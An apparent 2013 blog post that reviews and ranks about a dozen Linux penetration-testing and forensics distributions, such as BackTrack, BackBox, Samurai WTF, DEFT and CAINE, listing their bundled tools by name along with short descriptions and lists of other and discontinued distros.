Update May 2013: We have
updated this post! Please click here to see the latest news, RSS Feeds,
Videos, Specs and Reviews of the World’s Mostly Widely Used and Popular
Linux Penetration Testing Distributions. Click on the distro name to
jump straight to its’ specific page: Kali Linux, Knoppix STD, BackBox, Pentoo, DEFT, CAINE, Samurai WTF, Matriux Krypton, WEAKERTH4N, Bugtraq and NodeZero
Update May 2013: Related Post: Poll! Which is the best Linux Hacking Distro? Cast your vote!
Update March 2013: BackTrack has evolved into Kali Linux. Our blog post on this was mentioned on the PaulDotCom information security web show, read our Kali Linux Family Tree post and learn about the history and origin of this latest version of BackTrack. Kali Linux is the sixth pentesting distro from Offensive Security (the guys behind BackTrack).
Update February 2013:
Owing to some great comments below we edited this post so it has now
become the “12 Best Linux Penetration Distro List!”
OK, none of the following Pentesting distributions were in the top 100 list over at Distro Watch
but we don’t care – we are talking about penetration testing tools – or
specifically the creation of distro’s that have all the necessary open
source tools that help ethical hackers and penetration testers do their
job. Like everything else when it comes to choices, every pentesting
distro has its own pros, cons and specialty. Some distro for example are
better at web application vulnerability discovery, forensics, WiFi
cracking, reverse engineering, malware analysis, social engineering etc.1. BackTrack 5r3
The mamma or best known of Linux pentesting distros. BackTrack has a very cool strapline: “The quieter you become, the more you are able to hear.” That just sounds cool….
BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be only available within a KDE environment but Gnome become was added as an option with the release of BackTrack v5. For those working in Information Security or intrusion detection, BackTrack is one of the most popular pentesting distros that can run on a live CD or flash drive. The distribution is ideal for wireless cracking, exploiting, web application assessment, learning, or social-engineering a client.
Here is a list of some of the awesome tools available in BackTrack 5r3 (the latest release).
To identify Live Hosts:
dnmap – Distributed NMap
address6 – (which acts as a IPV6 address conversion)
Information Gathering Analysis (Social Engineering)
Jigsaw – Grabs information about company employees
Uberharvest – Email harvester
sslcaudit – SSL Cert audit
VoIP honey – VoIP Honeypot
urlcrazy – Detects URL typos used in typo squatting, url hijacking, phishing
Web Crawlers
Apache_users – Apache username enumerator
Deblaze – Performs enumeration and interrogation against Flash remote end points
Database Analysis
Tnscmd10g – Allows you to inject commands into Oracle
BBQSQL – Blind SQL injection toolkit
* If you are interested in Database Security see our Hacker Halted summary here.
Bluetooth Analysis
Blueranger – Uses link quality to locate Bluetooth devices
Vulnerability Assessment
Lynis – Scans systems & software for security issues
DotDotPwn – Directory Traversal fuzzer
Exploitation Tools
Netgear-telnetable – Enables Telnet console on Netgear devices
Terminator – Smart Meter tester
Htexploit – Tool to bypass standard directory protection
Jboss-Autopwn – Deploys JSP shell on target JBoss servers
Websploit – Scans & analyses remote systems for vulnerabilities
Wireless Exploitation Tools
Bluepot – Bluetooth honeypot
Spooftooph – Spoofs or clones Bluetooth devices
Smartphone-Pentest-Framework
Fern-Wifi-cracker – Gui for testing Wireless encryption strength
Wi-fihoney – Creates fake APs using all encryption and monitors with Airodump
Wifite – Automated wireless auditor
Password Tools
Creddump
Johnny
Manglefizz
Ophcrack
Phrasendresher
Rainbowcrack
Acccheck
smbexec
2. NodeZero.
Like
BackTrack, NodeZero is an Ubuntu based distro used for penetration
testing using repositories so every time Ubuntu releases a patch for its
bugs, you also are notified for system updates or upgrades. Node Zero
used to be famous for its inclusion of THC IPV6 Attack Toolkit which
includes tools like alive6, detect-new-ip6, dnsdict6, etc, but I think
that these days BackTrack 5r3 also includes these tools.Whereas BackTrack is touted as being a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) state that the distros real strength comes from a hard install. NodeZero, in their own words, believe that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable Linux environment. Sounds cool. Ever tried it? Let us know in the comments below.
3. BackBox Linux
BackBox
is getting more popular by the day. Like BackTrack and NodeZero,
BackBox Linux is an Ubuntu-based distribution developed to perform
penetration tests and security assessments. The developers state that
the intention with BackBox is to create a pentesting distro that is fast
and easy to use. BackBox does have a pretty concise looking desktop
environment and seems to work very well. Like the other distros BackBox
is always updated to the latest stable versions of the most often used
and best-known ethical hacking tools through repositories.BackBox has all the usual suspect for Forensic Analysis, Documentation & Reporting and Reverse Engineering with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.
4. Blackbuntu.
Yes,
as the name clearly suggests, this is yet another distro that is based
on Ubuntu. Here is a list of Security and Penetration Testing tools – or
rather categories available within the Blackbuntu package, (each
category has many sub categories) but this gives you a general idea of
what comes with this pentesting distro: Information Gathering, Network
Mapping, Vulnerability Identification, Penetration, Privilege
Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis,
Digital Forensic, Reverse Engineering and a Miscellaneous section. This
list is hardly revolutionary but the tools contained within might be
different to the other distros.5. Samurai Web Testing Framework.
This
is a live Linux distro that has been pre-configured with some of the
best of open source and free tools that focus on testing and attacking
websites. (The difference with Samurai Web Testing Framework is that it
focuses on attacking (and therefore being able to defend) websites. The
developers outline four steps of a web pen-test. These steps are
incorporated within the distro and contain the necessary tools to
complete the task.Step 1: Reconnaissance – Tools include Fierce domain scanner and Maltego.
Step 2: Mapping – Tools include WebScarab and ratproxy.
Step 3: Discovery – Tools include w3af and burp.
Step 4: Exploitation – Tools include BeEF, AJAXShell and much more.
Of interest as well, the Live CD also includes a pre-configured wiki, set up to be a central information store during your pen-test.
The Samurai Web Testing Framework is a live Linux distro that focuses on web application vulnerability research and web pentesting within a “safe environment” – i.e. so you can ethical hack without violating any laws. This is a pentesting distro recommended for penetration testers who wants to combine network and web app techniques.
6. Knoppix STD.
This
distro is based on Debian and originated in Germany. The architecture
is i486 and runs from the following desktops: GNOME, KDE, LXDE and also
Openbox. Knoppix has been around for a long time now – in fact I think
it was one of the original live distros.Knoppix is primarily designed to be used as a Live CD, it can also be installed on a hard disk. The STD in the Knoppix name stands for Security Tools Distribution. The Cryptography section is particularly well-known in Knoppix.
7. Pentoo.
Pentoo
is a security-focused live CD based on Gentoo. In their own words
“Pentoo is Gentoo with the pentoo overlay.” So, if you are into Pentoo
then this is the distro for you. Their homepage lists some of their
customized tools and kernel, including: a Hardened Kernel with aufs
patches, Backported Wifi stack from latest stable kernel release, Module
loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking support
with development tools.8. WEAKERTH4N.
This
penetration distribution is built from Debian Squeeze and uses Fluxbox
for its’ desktop environment. This pentesting distro is particularly
well adjusted for WiFi hacking since it contains many Wireless tools.
Here is a quick summary of WEAKERTH4N’s tool categories: Wifi attacks,
SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking,
Bluetooth, VoIP Hacking, Social Engineering, Information Gathering,
Fuzzing, Android Hacking, Networking and Shells.9. Matriux Krypton.
This
linux distro is, I believe, is the first security distribution based
directly on Debian, (after WEAKERTH4N?) if I am wrong please comment
below! There are 300 security tools to work, called “arsenals”. The
arsenals allow for penetration testing, ethical hacking, system and
network administration, security testing, vulnerability analysis, cyber
forensics investigations, exploiting, cracking and data recovery. The
last category, data recovery, doesn’t seem to be prevalent in the other
distros.10. DEFT.
The
latest version is DEFT 7 which is based on the new Linux Kernel 3 and
the DART (Digital Advanced Response Toolkit). This distro is more
orientated towards Computer Forensics and uses LXDE as desktop
environment and WINE for executing Windows tools under Linux. The
developers, (based in Italy) hope that their distro will be used by the
Military, Police, Investigators, IT Auditors and professional
penetration testers. DEFT is an abbreviation for “Digital Evidence &
Forensic Toolkit”11. CAINE
A
reader to our blog suggested to add CAINE which we duly have. CAINE
Stands for Computer Aided Investigative Environment, and like many
information security products and tools – it is Italian GNU/Linux live
distribution. CAINE offers a comprehensive forensic environment that is
organized to integrate existing software tools that are composed as
software modules, all displayed within a friendly graphical interface.
CAINE states to have three objectives. These are, to ensure that the
distro works in an interoperable environment that supports the digital
investigator during the four phases of the digital investigation.
Secondly that the distro has a user friendly graphical interface and
finally that it provides a semi-automated compilation of the final
forensic report. As you would likely expect, CAINE is fully open-source.If anyone has used this please let us know.
12. Bugtraq
Bugtraq
is another reader submitted pentesting distro. Based on the 26.6.38
kernel, this distro offers a really wide range of penetration and
forensic tools. Like most of the others in this list, Bugtraq can
hard-install of obviously run as a Live DVD or from a USB drive. Bugtraq
claims to have recently configured and updated the kernel for better
performance but also importantly so that it can recognize more hardware,
including wireless injection patches pentesting. The team at Bugtraq
seem solid because they are clearly making an effort to get the kernel
to work with more hardware – something which the other distributions
don’t always place enough importance.Some of the special features included with Bugtraq include (as stated) an expanded range of recognition for injection wireless drivers, (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.
Unique to Bugtraq (as claimed on their site) is the ability to, or better said, ease, of deleting tracks and backdoors. Just by having read about Bugtraq I’m really glad that I can add this to the list because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Buqtraq: Malware, Penetration Shield, Web audit, Brute force attack, Communication and Forensics Analytics, Sniffers, Virtualizations, Anonymity and Tracking, Mapping and Vulnerability detection.
Quick Summary: You can’t go wrong with any Ubuntu based distro. BackTrack does the job well but I guess, of course, it’s all personal – i.e. does the distro do the job for you? Every penetration tester needs a lean towards a particular tool or tool-set. Frankly they are all good, and it would be prudent to use several of these pentesting distros as live versions. For WiFi hacking then WEAKERTH4N is likely your better friend, whilst to stay within the law, use Samurai.
Bugtraq looks really good – the team behind it seems to have taken considerable time to tick all the boxes. Once we test it I’ll update the post.
Here is a list of other distros (which we think are still alive and kicking – please correct us if we are wrong).
Other Distro’s
Damn Vulnerable Linux (reader comment: more of an operating system for attacking purposes)
Hakin9 (an educational and training distro that you can use to play-along with when subscribing to the Hacking Magazine Hak9)
Helix
nUbuntu
Network Security Toolkit (NST)
OWASP Labrat
Frenzy
grml
Ophcrack
FCCU
OSWA Assistant
Russix
Chaox-NG
GnackTrack
Katana
Securix-NSM
Auditor
And here is a list of distros that, regrettably, have passed on to Linux Heaven.
KCPentrix
Protech
FIRE
Arudius
INSERT
Local Area Security (LAS)
NavynOS
Operator
PHLAK
PLAC
SENTINIX
Talos
ThePacketMaster
Trinux
WarLinux
Whoppix
WHAX
HeX
Stagos FSE
SNARL
0 komentar:
Posting Komentar